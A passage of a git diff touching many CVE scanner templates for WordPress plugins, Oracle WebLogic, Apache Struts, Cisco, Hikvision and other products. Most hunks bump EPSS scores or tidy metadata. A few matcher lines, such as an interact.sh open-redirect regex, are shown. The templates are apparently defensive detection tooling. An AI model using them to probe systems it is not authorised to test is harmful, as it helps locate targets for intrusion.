490a0046304402205a9cbf97a74971e3db6e3722bc8b06a00ed280e27712be08b66f70acf2e11ffb022067b294843ced3fcc5e571d20a9c3cc6eed709c3f5237d762b234559ffb156bef:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18558.yaml b/http/cves/2017/CVE-2017-18558.yaml index ce3510bcea..688ed53941 100644 --- a/http/cves/2017/CVE-2017-18558.yaml +++ b/http/cves/2017/CVE-2017-18558.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18558 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.37 + epss-percentile: 0.36961 cpe: cpe:2.3:a:bestwebsoft:testimonials:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -51,4 +51,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Testimonials by BestWebSoft")' condition: and -# digest: 4b0a00483046022100a7ae4084f2f4242d57d2a072fe659c8d365869a809e466405f9ea9b41a5e87e102210084ffa655d147c5be8354647307b6837c245b700274dd095222d9cb009597a5a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100a7ae4084f2f4242d57d2a072fe659c8d365869a809e466405f9ea9b41a5e87e102210084ffa655d147c5be8354647307b6837c245b700274dd095222d9cb009597a5a5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18562.yaml b/http/cves/2017/CVE-2017-18562.yaml index 8dcd42a833..ea15945b95 100644 --- a/http/cves/2017/CVE-2017-18562.yaml +++ b/http/cves/2017/CVE-2017-18562.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18562 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.37 + epss-percentile: 0.36961 cpe: cpe:2.3:a:bestwebsoft:error_log_viewer:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -51,4 +51,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Error Log Viewer by BestWebSoft")' condition: and -# digest: 4b0a00483046022100d44652998758af9d27258ace9f000694878f09439ed4321067c25d3900aa713f0221009360ed0fb57decb429282ed972d2c43ceab26c3db0a8e06a3423069418881e15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d44652998758af9d27258ace9f000694878f09439ed4321067c25d3900aa713f0221009360ed0fb57decb429282ed972d2c43ceab26c3db0a8e06a3423069418881e15:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18564.yaml b/http/cves/2017/CVE-2017-18564.yaml index d5e9e91046..d1ff631b09 100644 --- a/http/cves/2017/CVE-2017-18564.yaml +++ b/http/cves/2017/CVE-2017-18564.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18564 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.37 + epss-percentile: 0.36961 cpe: cpe:2.3:a:bestwebsoft:sender:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -51,4 +51,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Sender by BestWebSoft")' condition: and -# digest: 4a0a00473045022100c0926bbaf2a8f3335e30647e532e19080ac59d7d23764721d49818ba02e1fe3d0220775336a3696c10ddc521469cf845860fc305eb0dfe77f82c389b17477eb6bb87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c0926bbaf2a8f3335e30647e532e19080ac59d7d23764721d49818ba02e1fe3d0220775336a3696c10ddc521469cf845860fc305eb0dfe77f82c389b17477eb6bb87:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18565.yaml b/http/cves/2017/CVE-2017-18565.yaml index a98481fd4f..6a38c0dee1 100644 --- a/http/cves/2017/CVE-2017-18565.yaml +++ b/http/cves/2017/CVE-2017-18565.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18565 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.37 + epss-percentile: 0.36961 cpe: cpe:2.3:a:bestwebsoft:updater:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -51,4 +51,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Updater by BestWebSoft")' condition: and -# digest: 4a0a00473045022100d3b9d556a2b3187329eab6c672345dff53ccb100aeed404341a82f53056647150220761b8dbb321ecb7da56d1598bdd3d3e3efc80a7f66c2f27b500ece91d7596210:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d3b9d556a2b3187329eab6c672345dff53ccb100aeed404341a82f53056647150220761b8dbb321ecb7da56d1598bdd3d3e3efc80a7f66c2f27b500ece91d7596210:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18566.yaml b/http/cves/2017/CVE-2017-18566.yaml index 7328dfff3e..05fec522b3 100644 --- a/http/cves/2017/CVE-2017-18566.yaml +++ b/http/cves/2017/CVE-2017-18566.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18566 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.37 + epss-percentile: 0.36961 cpe: cpe:2.3:a:bestwebsoft:user_role:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -51,4 +51,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "User Role by BestWebSoft")' condition: and -# digest: 4b0a00483046022100cd8c0ef1179a8d5224277b014bae2051b214c9a3c918cd05ea5e05d86bbefcfe022100f87b757fba08a3ffefc828554270d19c7589782c7d5282937c57f0e5e93055b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100cd8c0ef1179a8d5224277b014bae2051b214c9a3c918cd05ea5e05d86bbefcfe022100f87b757fba08a3ffefc828554270d19c7589782c7d5282937c57f0e5e93055b2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index 05f2e0fa3c..3b5a4ea80d 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18598 cwe-id: CWE-79 epss-score: 0.00094 - epss-percentile: 0.3949 + epss-percentile: 0.39433 cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -43,4 +43,5 @@ http: part: body words: - "console.log" -# digest: 490a00463044022019426de205230ee91f4e59ed9c12e7959d4cf98f879f3b999c93eb36f281c66a02201850fc067956244ed54ba9057346d8ad48d9ec1ce9572e76ba1e7115617f0ef7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022019426de205230ee91f4e59ed9c12e7959d4cf98f879f3b999c93eb36f281c66a02201850fc067956244ed54ba9057346d8ad48d9ec1ce9572e76ba1e7115617f0ef7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml index 4a3df6bdbe..b1e4fbe2c3 100644 --- a/http/cves/2017/CVE-2017-18638.yaml +++ b/http/cves/2017/CVE-2017-18638.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-18638 cwe-id: CWE-918 epss-score: 0.00902 - epss-percentile: 0.80911 + epss-percentile: 0.80896 cpe: cpe:2.3:a:graphite_project:graphite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index 4374c98740..084001e1a4 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 7.4 cve-id: CVE-2017-3506 - epss-score: 0.96927 - epss-percentile: 0.99649 + epss-score: 0.96935 + epss-percentile: 0.99655 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml index aa1f69c907..1bccb9e0ab 100644 --- a/http/cves/2017/CVE-2017-3528.yaml +++ b/http/cves/2017/CVE-2017-3528.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-3528 cwe-id: CWE-601 epss-score: 0.00865 - epss-percentile: 0.80451 + epss-percentile: 0.80439 cpe: cpe:2.3:a:oracle:applications_framework:12.1.3:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +37,5 @@ http: part: body words: - 'noresize src="/\interact.sh?configName=' -# digest: 490a0046304402203efe3cbf17340f01d8907c4c57e4e37312ad0f5034c5641b8d580d2b2191d893022033a44dceab1ea2700c1e71c8389d415ac78574d36fce98813e83e3b3f2d0453b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402203efe3cbf17340f01d8907c4c57e4e37312ad0f5034c5641b8d580d2b2191d893022033a44dceab1ea2700c1e71c8389d415ac78574d36fce98813e83e3b3f2d0453b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml index 35a179591a..f1b82e1dca 100644 --- a/http/cves/2017/CVE-2017-4011.yaml +++ b/http/cves/2017/CVE-2017-4011.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-4011 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.49913 + epss-percentile: 0.4989 cpe: cpe:2.3:a:mcafee:network_data_loss_prevention:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: part: header words: - "text/html" -# digest: 4a0a00473045022100f0f82188ea1081652e4da54568b1b7479f8fd19ee32adabf9407430bfeb17ee202200e82903b412d3d79584795520490500fec30fbb466a4d9677334297ba02515ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100f0f82188ea1081652e4da54568b1b7479f8fd19ee32adabf9407430bfeb17ee202200e82903b412d3d79584795520490500fec30fbb466a4d9677334297ba02515ca:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml index 782d0f039d..9199d924da 100644 --- a/http/cves/2017/CVE-2017-5631.yaml +++ b/http/cves/2017/CVE-2017-5631.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-5631 cwe-id: CWE-79 epss-score: 0.00286 - epss-percentile: 0.65302 + epss-percentile: 0.65307 cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210099e698ad19cf83dbf012513fc11ad9b5870d2c1390e623bb18d1db27359b1d280221008894a1c8145adf16597a1e1f20c0b4e883dfe52e990b4311dd029ee0ee7befc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a0048304602210099e698ad19cf83dbf012513fc11ad9b5870d2c1390e623bb18d1db27359b1d280221008894a1c8145adf16597a1e1f20c0b4e883dfe52e990b4311dd029ee0ee7befc3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml index 42b505d067..d89033c636 100644 --- a/http/cves/2017/CVE-2017-5638.yaml +++ b/http/cves/2017/CVE-2017-5638.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-5638 cwe-id: CWE-20 epss-score: 0.97536 - epss-percentile: 0.99992 + epss-percentile: 0.99993 cpe: cpe:2.3:a:apache:struts:2.3.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml index 78daaab6da..86c5f55d33 100644 --- a/http/cves/2017/CVE-2017-5689.yaml +++ b/http/cves/2017/CVE-2017-5689.yaml @@ -19,7 +19,7 @@ info: cvss-score: 9.8 cve-id: CVE-2017-5689 epss-score: 0.97416 - epss-percentile: 0.99915 + epss-percentile: 0.99916 cpe: cpe:2.3:o:intel:active_management_technology_firmware:6.0:*:*:*:*:*:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022067fa4264ffe84a34a8a10af0153575408a344683e436e95b0d2c9b9b80649c6802201c8fdd223a85333e883e475f0b105b4cdc8e78beeecea75017882b518291ba10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022067fa4264ffe84a34a8a10af0153575408a344683e436e95b0d2c9b9b80649c6802201c8fdd223a85333e883e475f0b105b4cdc8e78beeecea75017882b518291ba10:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-5982.yaml b/http/cves/2017/CVE-2017-5982.yaml index 337b1fcbe7..6089b78710 100644 --- a/http/cves/2017/CVE-2017-5982.yaml +++ b/http/cves/2017/CVE-2017-5982.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-5982 cwe-id: CWE-22 epss-score: 0.0488 - epss-percentile: 0.91927 + epss-percentile: 0.91916 cpe: cpe:2.3:a:kodi:kodi:17.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml index 30a0697507..723430514d 100644 --- a/http/cves/2017/CVE-2017-6090.yaml +++ b/http/cves/2017/CVE-2017-6090.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-6090 cwe-id: CWE-434 epss-score: 0.9726 - epss-percentile: 0.99811 + epss-percentile: 0.99812 cpe: cpe:2.3:a:phpcollab:phpcollab:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml index 8eb504273c..23ec219131 100644 --- a/http/cves/2017/CVE-2017-7391.yaml +++ b/http/cves/2017/CVE-2017-7391.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-7391 cwe-id: CWE-79 epss-score: 0.00195 - epss-percentile: 0.57281 + epss-percentile: 0.57269 cpe: cpe:2.3:a:magmi_project:magmi:0.7.22:*:*:*:*:*:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b238a4ecfe319c7a2468edff3e586e001a0e11be4f0e99ed6a86811bb2e098a702205e3500117044e99a53c5a108e22bbb624785ab3769a9bc39da803c058d85ec5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b238a4ecfe319c7a2468edff3e586e001a0e11be4f0e99ed6a86811bb2e098a702205e3500117044e99a53c5a108e22bbb624785ab3769a9bc39da803c058d85ec5b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-7615.yaml b/http/cves/2017/CVE-2017-7615.yaml index fe7056ef46..4e16952a4d 100644 --- a/http/cves/2017/CVE-2017-7615.yaml +++ b/http/cves/2017/CVE-2017-7615.yaml @@ -24,7 +24,7 @@ info: cve-id: CVE-2017-7615 cwe-id: CWE-640 epss-score: 0.97404 - epss-percentile: 0.99908 + epss-percentile: 0.99909 cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:* metadata: max-request: 5 diff --git a/http/cves/2017/CVE-2017-7855.yaml b/http/cves/2017/CVE-2017-7855.yaml index 7993c15292..df9a29e319 100644 --- a/http/cves/2017/CVE-2017-7855.yaml +++ b/http/cves/2017/CVE-2017-7855.yaml @@ -11,16 +11,18 @@ info: - https://technical.nttsecurity.com/post/102eegq/cookies-are-delicious - https://nvd.nist.gov/vuln/detail/CVE-2017-7855 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-7855 cwe-id: CWE-79 + epss-score: 0.0009 + epss-percentile: 0.378 cpe: cpe:2.3:a:icewarp:server:11.3.1.5:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: icewarp - product: mail_server + product: server shodan-query: title:"icewarp" tags: cve,cve2017,xss,icewarp @@ -47,4 +49,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bc4bb2221f703774952ab4b4c9df88338d36b99fd0acdbf1416057a91616a20d022100b230f8f6889f15252ddc0c2371e2bc9cb2ddd404e124f90aeb3626768dc32531:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100bc4bb2221f703774952ab4b4c9df88338d36b99fd0acdbf1416057a91616a20d022100b230f8f6889f15252ddc0c2371e2bc9cb2ddd404e124f90aeb3626768dc32531:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml index a4d846d3a0..412beddf4b 100644 --- a/http/cves/2017/CVE-2017-7921.yaml +++ b/http/cves/2017/CVE-2017-7921.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-7921 cwe-id: CWE-287 epss-score: 0.01361 - epss-percentile: 0.84743 + epss-percentile: 0.84712 cpe: cpe:2.3:o:hikvision:ds-2cd2032-i_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-7925.yaml b/http/cves/2017/CVE-2017-7925.yaml index 07ea5b1508..45bcce0bd3 100644 --- a/http/cves/2017/CVE-2017-7925.yaml +++ b/http/cves/2017/CVE-2017-7925.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-7925 cwe-id: CWE-522,CWE-260 epss-score: 0.35031 - epss-percentile: 0.96705 + epss-percentile: 0.96704 cpe: cpe:2.3:o:dahuasecurity:dh-ipc-hdbw23a0rn-zs_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-8229.yaml b/http/cves/2017/CVE-2017-8229.yaml index 658de09ab8..4b973c10c4 100644 --- a/http/cves/2017/CVE-2017-8229.yaml +++ b/http/cves/2017/CVE-2017-8229.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-8229 cwe-id: CWE-255 epss-score: 0.90501 - epss-percentile: 0.98513 + epss-percentile: 0.98516 cpe: cpe:2.3:o:amcrest:ipm-721s_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-9140.yaml b/http/cves/2017/CVE-2017-9140.yaml index e8a12420ac..7a132138b7 100644 --- a/http/cves/2017/CVE-2017-9140.yaml +++ b/http/cves/2017/CVE-2017-9140.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-9140 cwe-id: CWE-79 epss-score: 0.00191 - epss-percentile: 0.56669 + epss-percentile: 0.56655 cpe: cpe:2.3:a:progress:telerik_reporting:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cc151de32af5cf439dd2417f33acadc33e66f781834a239d049e76b843b4bf89022100a33f49a3383d7fb291c8799004bd697e20eae80aa66270c7c119864683ff63b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100cc151de32af5cf439dd2417f33acadc33e66f781834a239d049e76b843b4bf89022100a33f49a3383d7fb291c8799004bd697e20eae80aa66270c7c119864683ff63b5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml index f1fa16bf3e..773fc43df5 100644 --- a/http/cves/2017/CVE-2017-9288.yaml +++ b/http/cves/2017/CVE-2017-9288.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-9288 cwe-id: CWE-79 epss-score: 0.00168 - epss-percentile: 0.53752 + epss-percentile: 0.53728 cpe: cpe:2.3:a:raygun:raygun4wp:1.8.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022050023b72a55abb5b6fe4d9162641640214b3326bc6f9a37e396225e72a1dcfd602210085bd673615c2cf872a52f23abbf8fe253a677092851bd42f2c563eed8880ba1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022050023b72a55abb5b6fe4d9162641640214b3326bc6f9a37e396225e72a1dcfd602210085bd673615c2cf872a52f23abbf8fe253a677092851bd42f2c563eed8880ba1b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index 8496edd4fe..423d4e641b 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-9416 cwe-id: CWE-22 epss-score: 0.01037 - epss-percentile: 0.82247 + epss-percentile: 0.8223 cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml index 15e8a0e79f..bae20c4d17 100644 --- a/http/cves/2017/CVE-2017-9506.yaml +++ b/http/cves/2017/CVE-2017-9506.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-9506 cwe-id: CWE-918 epss-score: 0.00575 - epss-percentile: 0.75471 + epss-percentile: 0.75459 cpe: cpe:2.3:a:atlassian:oauth:1.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml index c4bb58ec5c..74765c4cae 100644 --- a/http/cves/2017/CVE-2017-9822.yaml +++ b/http/cves/2017/CVE-2017-9822.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-9822 cwe-id: CWE-20 epss-score: 0.96098 - epss-percentile: 0.99348 + epss-percentile: 0.99351 cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml index 96d23040cc..3ccfc38f39 100644 --- a/http/cves/2017/CVE-2017-9833.yaml +++ b/http/cves/2017/CVE-2017-9833.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-9833 cwe-id: CWE-22 epss-score: 0.35156 - epss-percentile: 0.96711 + epss-percentile: 0.9671 cpe: cpe:2.3:a:boa:boa:0.94.14.21:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100906ee663559fd83cc1d1958cefe3c966167882509135fbb6e8e658c6cba2dc16022070db23bbddd6be7f8af76d96c9b097dc95364484857c5b5efded8fb51b45e588:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100906ee663559fd83cc1d1958cefe3c966167882509135fbb6e8e658c6cba2dc16022070db23bbddd6be7f8af76d96c9b097dc95364484857c5b5efded8fb51b45e588:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml index bc90accecb..8d41350bf5 100644 --- a/http/cves/2018/CVE-2018-0127.yaml +++ b/http/cves/2018/CVE-2018-0127.yaml @@ -16,9 +16,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-0127 - cwe-id: CWE-306,CWE-200 + cwe-id: CWE-200,CWE-306 epss-score: 0.09982 - epss-percentile: 0.94287 + epss-percentile: 0.9428 cpe: cpe:2.3:o:cisco:rv132w_firmware:1.0.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-0296.yaml b/http/cves/2018/CVE-2018-0296.yaml index cdbc5e9ea3..3ee196d3bd 100644 --- a/http/cves/2018/CVE-2018-0296.yaml +++ b/http/cves/2018/CVE-2018-0296.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-0296 cwe-id: CWE-22,CWE-20 epss-score: 0.97381 - epss-percentile: 0.99896 + epss-percentile: 0.99895 cpe: cpe:2.3:a:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml index 0d5b3444e1..39c02108b3 100644 --- a/http/cves/2018/CVE-2018-1000129.yaml +++ b/http/cves/2018/CVE-2018-1000129.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-1000129 cwe-id: CWE-79 epss-score: 0.00257 - epss-percentile: 0.63372 + epss-percentile: 0.63364 cpe: cpe:2.3:a:jolokia:jolokia:1.3.7:*:*:*:*:*:*:* metadata: max-request: 2 @@ -54,4 +54,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022010e119d98a94fcc3004b93c3ae73504d300d9c8ee92adef037081e7382b519760220469010238a984da639882be50cdaf8dc909bc02e63a5a1a54e7777523e47d8ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022010e119d98a94fcc3004b93c3ae73504d300d9c8ee92adef037081e7382b519760220469010238a984da639882be50cdaf8dc909bc02e63a5a1a54e7777523e47d8ed:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml index a74538e162..259c018eb0 100644 --- a/http/cves/2018/CVE-2018-1000130.yaml +++ b/http/cves/2018/CVE-2018-1000130.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-1000130 cwe-id: CWE-74 epss-score: 0.89191 - epss-percentile: 0.98442 + epss-percentile: 0.98443 cpe: cpe:2.3:a:jolokia:webarchive_agent:1.3.7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml index bc5ecf982e..43cf8f6479 100644 --- a/http/cves/2018/CVE-2018-1000226.yaml +++ b/http/cves/2018/CVE-2018-1000226.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-1000226 cwe-id: CWE-732 epss-score: 0.01552 - epss-percentile: 0.85733 + epss-percentile: 0.85736 cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-1000533.yaml b/http/cves/2018/CVE-2018-1000533.yaml index 1f8b9c217c..edec2ed28c 100644 --- a/http/cves/2018/CVE-2018-1000533.yaml +++ b/http/cves/2018/CVE-2018-1000533.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-1000533 cwe-id: CWE-20 epss-score: 0.97242 - epss-percentile: 0.99802 + epss-percentile: 0.99803 cpe: cpe:2.3:a:gitlist:gitlist:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index 1c881c71c5..7847a60648 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-1000671 cwe-id: CWE-601 epss-score: 0.00745 - epss-percentile: 0.78788 + epss-percentile: 0.78784 cpe: cpe:2.3:a:sympa:sympa:*:*:*:*:*:*:*:* metadata: verified: true @@ -39,4 +39,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022014ea7b40b90e6cb6f166c50adc2a1dcdbfd002b8f1f96747c0bce739e46f22c6022100dc982854b1b76b219c6bdb2fae66821f422c44a9fcceb8833e182c6f539796de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022014ea7b40b90e6cb6f166c50adc2a1dcdbfd002b8f1f96747c0bce739e46f22c6022100dc982854b1b76b219c6bdb2fae66821f422c44a9fcceb8833e182c6f539796de:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index 2487db1b9a..8a5869afca 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-1000856 cwe-id: CWE-79 epss-score: 0.00101 - epss-percentile: 0.41319 + epss-percentile: 0.41274 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true @@ -63,4 +63,5 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210082905db13c46aa31d099f9c33e7eaf232da376a49f3951faa32532c0c736370f022100a234279a153cc6fe1bd1625b78f895c5cfac66feeabc3b3dc03dafb121a8aee9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a0048304602210082905db13c46aa31d099f9c33e7eaf232da376a49f3951faa32532c0c736370f022100a234279a153cc6fe1bd1625b78f895c5cfac66feeabc3b3dc03dafb121a8aee9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-10093.yaml b/http/cves/2018/CVE-2018-10093.yaml index bd5478a8e2..e996ccfe7a 100644 --- a/http/cves/2018/CVE-2018-10093.yaml +++ b/http/cves/2018/CVE-2018-10093.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-10093 cwe-id: CWE-862 epss-score: 0.06287 - epss-percentile: 0.92866 + epss-percentile: 0.92858 cpe: 